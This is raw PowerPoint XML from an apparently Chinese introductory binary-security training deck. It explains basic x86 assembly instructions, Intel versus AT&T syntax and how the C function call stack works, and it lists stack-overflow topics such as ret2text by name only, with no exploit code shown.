              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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7F7EA0A7-AB29-4680-B29C-251A83AE3EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5915694" y="2131456"/>
            <a:ext cx="3700529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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JMP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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>J[Condition]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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CALL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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LEAVE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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RET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3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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F3C4A32-06B5-4AE4-A53E-0FB0E835CF2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4455335" y="1566760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常用汇编指令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AE051B2-9F31-4490-B210-EBDC06E2317D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| x86&amp;amd64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汇编简述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305116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717AFD78-12AE-410C-AAF3-BD8E4ED6EFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116397" y="1233014"/>
            <a:ext cx="86273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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>MOV</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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3EAE2525-E9BE-4190-AB31-577FE090399F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="1898881"/>
            <a:ext cx="5471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MOV DEST, SRC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;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把源操作数传送给目标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7420CDA-CDD9-4688-ADFE-6D616CF27041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="2387738"/>
            <a:ext cx="61324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MOV EAX,1234H 	 ; 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执行结果（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EAX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） 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= 1234H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MOV EBX, EAX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MOV EAX, [00404011H]  ; [ ] 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表示取地址内的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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MOV EAX, [ESI]  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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C9BFB4D-4A8C-4E31-AD23-3BA2EB50B4B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116396" y="3820371"/>
            <a:ext cx="86273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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>LEA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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9A408D3B-C1BB-4C09-8F7D-0A710C940A61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547764" y="4486238"/>
            <a:ext cx="72596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LEA REG, SRC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;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把源操作数的有效地址送给指定的寄存器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3BECEDD-CC58-4F43-896E-4CDF1DFEF444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547763" y="4975095"/>
            <a:ext cx="84379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LEA EBX, ASC                    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址存放至 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EBX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>寄存器中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LEA EAX, 6[ESI]                 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>把 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ESI+6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单元的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位地址送给 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EAX </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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C6C88363-74F3-42BB-8402-DCBBC1B8ABDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| x86&amp;amd64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汇编简述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032066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717AFD78-12AE-410C-AAF3-BD8E4ED6EFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116397" y="1665377"/>
            <a:ext cx="108876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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>PUSH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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3EAE2525-E9BE-4190-AB31-577FE090399F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="2331244"/>
            <a:ext cx="66095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PUSH VALUE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;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把目标值压栈，同时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SP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指针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-1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字长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7420CDA-CDD9-4688-ADFE-6D616CF27041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="2820101"/>
            <a:ext cx="61324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PUSH 1234H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PUSH EAX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1681B94-EB9A-4FB3-8663-6CA3B3DCD2EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116397" y="3748043"/>
            <a:ext cx="86273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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>POP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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0BD8F46-DB95-4FD0-BBAE-06FD8169FA53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="4413910"/>
            <a:ext cx="82926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POP DEST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;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将栈顶的值弹出至目的存储位置，同时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SP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指针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+1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字长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80C8EF2-285D-485B-9AFC-F30F7DC74E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="4902767"/>
            <a:ext cx="6132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POP EAX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8B521834-EBC8-43B7-B1AA-30A369D345A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| x86&amp;amd64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汇编简述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535708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717AFD78-12AE-410C-AAF3-BD8E4ED6EFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116397" y="1624900"/>
            <a:ext cx="131478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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>LEAVE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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7420CDA-CDD9-4688-ADFE-6D616CF27041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="2329686"/>
            <a:ext cx="61324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在函数返回时，恢复父函数栈帧的指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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等效于：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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MOV ESP, EBP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POP EBP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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C9BFB4D-4A8C-4E31-AD23-3BA2EB50B4B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116396" y="3805856"/>
            <a:ext cx="86273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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>RET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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3BECEDD-CC58-4F43-896E-4CDF1DFEF444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547763" y="4423550"/>
            <a:ext cx="84379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在函数返回时，控制程序执行流返回父函数的指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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等效于：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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POP RIP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（这条指令实际是不存在的，不能直接向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RIP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寄存器传送数据）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A1598CFC-3167-47A4-B6B0-854F5871AB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| x86&amp;amd64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汇编简述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645261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Shape 228">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042C1C45-6B35-42E3-85B6-55A4A324188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58910591"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3162350" y="1753782"/>
          <a:ext cx="5867300" cy="233697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933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33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8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dirty="0" err="1"/>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" dirty="0"/>
                        <a:t>ntel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AT&amp;T</a:t>
                      </a:r>
                      <a:endParaRPr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8300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mov eax, 8</a:t>
                      </a:r>
                      <a:endParaRPr dirty="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movl $8, %eax</a:t>
                      </a:r>
                      <a:endParaRPr dirty="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8300"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mov ebx, 0ffffh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movl $0xffff, %ebx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8300"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int 80h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int $80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8300"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mov eax, [ecx]</a:t>
                      </a:r>
                      <a:endParaRPr dirty="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movl (%ecx), %eax</a:t>
                      </a:r>
                      <a:endParaRPr dirty="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" name="Shape 229">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09946BD-1CBB-4464-8F95-4AD615F49DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142289" y="4360463"/>
            <a:ext cx="2954557" cy="1954369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sum:</a:t>
            </a:r>
            <a:endParaRPr sz="12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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="12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mov ebp, esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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mov eax, [ebp+12]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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add eax, [ebp+8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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retn</a:t>
            </a:r>
            <a:endParaRPr sz="12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" name="Shape 230">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{521B6488-A68F-4405-8F87-1138DEBF34D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096846" y="4360463"/>
            <a:ext cx="2932804" cy="1954369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sum:</a:t>
            </a:r>
            <a:endParaRPr sz="12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pushl %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="12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movl %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="12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movl 12(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="12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addl 8(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="12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popl %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="12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ret</a:t>
            </a:r>
            <a:endParaRPr sz="12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F3B19CA-C801-468F-B577-E5237DA13117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080337" y="971286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两种汇编格式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AE4A910-F332-40BC-9B7F-B077C4B7848B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| x86&amp;amd64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汇编简述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338305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5F2DA9E7-F3F0-450B-B6C1-AB548372BBC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="816576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7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7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栈溢出基础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0A9DF66-10FF-420B-91B3-2B7CCBCAB118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589811" y="3049184"/>
            <a:ext cx="773083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语言函数调用栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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ret2text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ret2shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39619584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7C11A0F-4A40-400B-9DC4-E669E438E0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2637" y="4893307"/>
            <a:ext cx="3009363" cy="1964693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98AEB040-472E-45B8-B07E-B8CC64CBBEE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="230777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PWN? | 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概述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9423184-07F3-4070-A230-1A2EA62E6F92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477229" y="2588653"/>
            <a:ext cx="570540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破解、利用成功（程序的二进制漏洞）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攻破（设备、服务器）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控制（设备、服务器）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301593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D491AA73-6C9F-41E1-A9CA-BAD9AB5CDD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9183" y="1632769"/>
            <a:ext cx="6858000" cy="41529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B6875684-F35E-4A07-9595-7E0A2B6174F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534943" y="1629549"/>
            <a:ext cx="4011299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1A1A1A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函数调用栈是指程序运行时内存一段连续的区域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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1A1A1A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用来保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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函数运行时的状态信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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，包括函数参数与局部变量等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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1A1A1A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称之为“栈”是因为发生函数调用时，调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的状态被保存在栈内，被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的状态被压入调用栈的栈顶</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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1A1A1A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在函数调用结束时，栈顶的函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）状态被弹出，栈顶恢复到调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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）的状态</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A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1A1A1A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函数调用栈在内存中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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从高地址向低地址生长</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A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，所以栈顶对应的内存地址在压栈时变小，退栈时变大</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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D031153-67BB-46A4-9E6D-D0CCB11A217E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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791552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hape 619">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882F2EF2-FA22-4B45-91DD-8939C13C313B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="3"/>
            <a:endCxn id="28" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5265016" y="2349789"/>
            <a:ext cx="12700" cy="1294899"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="980000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3" name="Shape 622">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08A6371B-83C1-4E1A-AD6A-3AB5F953C370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6096000" y="1867020"/>
            <a:ext cx="5041894" cy="4168152"/>
            <a:chOff x="5524975" y="1183600"/>
            <a:chExt cx="3036475" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Shape 623">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70729A3-CB7B-4815-B509-C1B7F22E6356}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5524975" y="1596175"/>
              <a:ext cx="238200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8333"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF99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" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9474056B-F607-4267-9B7F-409725167A47}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5792750" y="1183600"/>
              <a:ext cx="2768700" cy="3551150"/>
              <a:chOff x="4897550" y="1085100"/>
              <a:chExt cx="2768700" cy="3551150"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EC097F4-B8DB-4720-8DCB-699B3683A01D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1212775"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr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7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33F9C2F-0E82-4BBF-A976-B252A4F4E6B9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1486975"/>
                <a:ext cx="1363200" cy="281099"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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dirty="0"/>
                  <a:t>Stack</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C4DDA1C-BAAD-4874-9E6F-FA12D12C5537}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1761175"/>
                <a:ext cx="1363200" cy="603900"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
